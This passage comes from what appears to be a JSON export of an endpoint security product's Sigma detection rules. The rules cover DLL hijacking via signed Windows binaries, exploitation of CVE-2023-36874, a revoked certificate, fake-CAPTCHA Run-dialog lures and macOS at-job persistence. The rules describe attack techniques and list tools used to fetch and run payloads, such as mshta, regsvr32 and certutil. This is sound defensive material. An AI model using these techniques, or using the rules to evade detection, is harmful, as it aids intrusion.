"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588153Z",
"creation_date": "2026-03-23T11:45:34.588157Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588165Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_label.yml",
"content": "title: DLL Hijacking via label.exe\nid: 0a4bf049-476a-4f76-b1ff-c92e630ba3ea\ndescription: |\n Detects potential Windows DLL Hijacking via label.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'label.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea",
"rule_name": "DLL Hijacking via label.exe",
"rule_description": "Detects potential Windows DLL Hijacking via label.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a708087-9ef8-4db8-b5a9-84d30391d776",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591044Z",
"creation_date": "2026-03-23T11:45:34.591047Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591055Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdsched.yml",
"content": "title: DLL Hijacking via mdsched.exe\nid: 0a708087-9ef8-4db8-b5a9-84d30391d776\ndescription: |\n Detects potential Windows DLL Hijacking via mdsched.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdsched.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\bcd.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a708087-9ef8-4db8-b5a9-84d30391d776",
"rule_name": "DLL Hijacking via mdsched.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdsched.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a956b02-3359-4969-9418-cfa7e8279f9e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609800Z",
"creation_date": "2026-03-23T11:45:34.609803Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609811Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_wer_service_vulnerability.yml",
"content": "title: WER Service CVE-2023-36874 Vulnerability Exploited\nid: 0a956b02-3359-4969-9418-cfa7e8279f9e\ndescription: |\n Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\n Microsoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\n It is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\nreferences:\n - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36874\n - https://attack.mitre.org/techniques/T1068/\ndate: 2023/08/24\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2023-36874\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-36874\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\wermgr.exe'\n # C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wercplsupport\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'wercplsupport'\n\n filter_signed:\n OriginalFileName: 'WerMgr'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a956b02-3359-4969-9418-cfa7e8279f9e",
"rule_name": "WER Service CVE-2023-36874 Vulnerability Exploited",
"rule_description": "Detects exploitation of CVE-2023-36874 a vulnerability affecting the Windows Error Reporting (WER) component.\nMicrosoft Windows Error Reporting Service contains a vulnerability that allows a local user, without administrator privileges, to escalate as SYSTEM.\nIt is recommended to investigate if the exploitation was successful by looking at integrity level of the process that triggered the alert.\n",
"rule_creation_date": "2023-08-24",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0a95ac1e-214e-4581-b19e-5ba1e9731861",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088105Z",
"creation_date": "2026-03-23T11:45:34.088107Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088111Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_dicol_effluent_revoked_certificate.yml",
"content": "title: Process Executed Signed with Revoked Certificate\nid: 0a95ac1e-214e-4581-b19e-5ba1e9731861\ndescription: |\n Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\n Malicious usage of this certificate has already been seen by the threat actor UNC2596.\n It is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\nreferences:\n - https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/09/27\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '3e22bfc34b0718ee1416cc5bf1f7b2b646f5b56a'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0a95ac1e-214e-4581-b19e-5ba1e9731861",
"rule_name": "Process Executed Signed with Revoked Certificate",
"rule_description": "Detects the execution of a process signed using a DICOL EFFLUENT revoked certificates.\nMalicious usage of this certificate has already been seen by the threat actor UNC2596.\nIt is recommended to terminate processes signed with revoked DICOL EFFLUENT certificates and isolate affected systems.\n",
"rule_creation_date": "2022-09-27",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623495Z",
"creation_date": "2026-03-23T11:45:34.623497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/004/"
],
"name": "t1204_001_run_command_explorer.yml",
"content": "title: Suspicious Process Executed via Run Prompt\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee\ndescription: |\n Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\n In this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\n It is recommended to investigate the entire process chain following any suspicious Run dialog executions.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2024/11/12\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|re: '(?i).*\\|.:\\\\Windows\\\\System32\\\\user32\\.dll!SendMessageW\\+0x[a-f0-9]*$'\n StackTrace|contains:\n - 'CallWindowProcW'\n - 'DispatchMessageW'\n ParentImage|endswith: '\\explorer.exe'\n Image|startswith: '?:\\windows\\'\n # Ensure commandline containes at least a space -> there are some args\n CommandLine|contains: ' '\n\n selection_image:\n - Image:\n - '?:\\Windows\\hh.exe'\n - '?:\\Windows\\System32\\mshta.exe'\n - '?:\\Windows\\SysWOW64\\mshta.exe'\n - '?:\\Windows\\System32\\PresentationHost.exe'\n - '?:\\Windows\\SysWOW64\\PresentationHost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - Image:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\windows\\system32\\regsvr32.exe'\n - '?:\\windows\\SysWOW64\\regsvr32.exe'\n - '?:\\windows\\system32\\rundll32.exe'\n - '?:\\windows\\SysWOW64\\rundll32.exe'\n CommandLine|contains: 'http'\n\n selection_cmd:\n Image:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n CommandLine|contains:\n - 'mshta'\n - 'PresentationHost'\n - 'powershell'\n - 'msiexec'\n - 'regsvr32'\n - 'rundll32'\n - 'curl'\n - 'certutil'\n\n filter_lnk:\n LnkPath|contains: '?'\n\n exclusion_powershell:\n CommandLine:\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -noprofile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process PowerShell -Verb RunAs'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -ExecutionPolicy Bypass -File ?:\\\\*\\Scripts\\\\*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe -Command Start-Process notepad.exe *'\n\n exclusion_msiexec:\n CommandLine|startswith: '?:\\Windows\\system32\\msiexec.exe /* \\\\\\\\*.local\\'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74aee",
"rule_name": "Suspicious Process Executed via Run Prompt",
"rule_description": "Detects suspicious programs executed via the Windows Run dialog (Win+R) that are initiated after users interact with fake CAPTCHA verification prompts.\nIn this attack vector, users are presented with a fake CAPTCHA verification page displaying an \"I'm not a robot\" checkbox. After clicking the checkbox, users are instructed to execute specific commands via the Windows Run dialog (Win+R). Attackers exploit user trust in familiar verification systems to trick them into manually executing malicious commands, which are usually related to LummaStealer.\nIt is recommended to investigate the entire process chain following any suspicious Run dialog executions.\n",
"rule_creation_date": "2024-11-12",
"rule_modified_date": "2026-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.004",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093337Z",
"creation_date": "2026-03-23T11:45:34.093339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/002/"
],
"name": "t1053_002_at_scheduler_enabled.yml",
"content": "title: At Jobs Enabled via Launchd\nid: 0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5\ndescription: |\n Detects the loading of file related to the `at` utility by launchd.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/05/10\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/launchctl'\n CommandLine|contains|all:\n - 'load'\n - '/com.apple.atrun.plist'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ab5a1ee-2e2d-40e4-874a-d5e2f3b74fc5",
"rule_name": "At Jobs Enabled via Launchd",
"rule_description": "Detects the loading of file related to the `at` utility by launchd.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the /var/at/jobs folder for suspicious jobs.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-01-28",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1053.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599572Z",
"creation_date": "2026-03-23T11:45:34.599576Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599583Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cidiag.yml",
"content": "title: DLL Hijacking via CIDiag.exe\nid: 0ac5fafe-dc2c-42bf-9d26-3882b0df7857\ndescription: |\n Detects potential Windows DLL Hijacking via CIDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CIDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ac5fafe-dc2c-42bf-9d26-3882b0df7857",
"rule_name": "DLL Hijacking via CIDiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CIDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618712Z",
"creation_date": "2026-03-23T11:45:34.618714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618718Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_workfolders.yml",
"content": "title: DLL Hijacking via workfolders.exe\nid: 0ad1a87e-1efd-47a3-a74b-3ec148f9992a\ndescription: |\n Detects potential Windows DLL Hijacking via workfolders.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - 